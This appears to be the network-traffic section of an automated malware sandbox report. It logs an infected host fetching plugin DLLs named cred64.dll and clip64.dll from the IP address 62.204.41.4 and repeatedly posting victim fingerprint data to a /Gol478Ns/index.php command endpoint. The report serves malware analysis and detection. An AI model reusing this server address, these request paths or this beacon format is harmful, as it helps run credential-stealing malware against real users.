                              Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.4
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1Host: 62.204.41.4
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
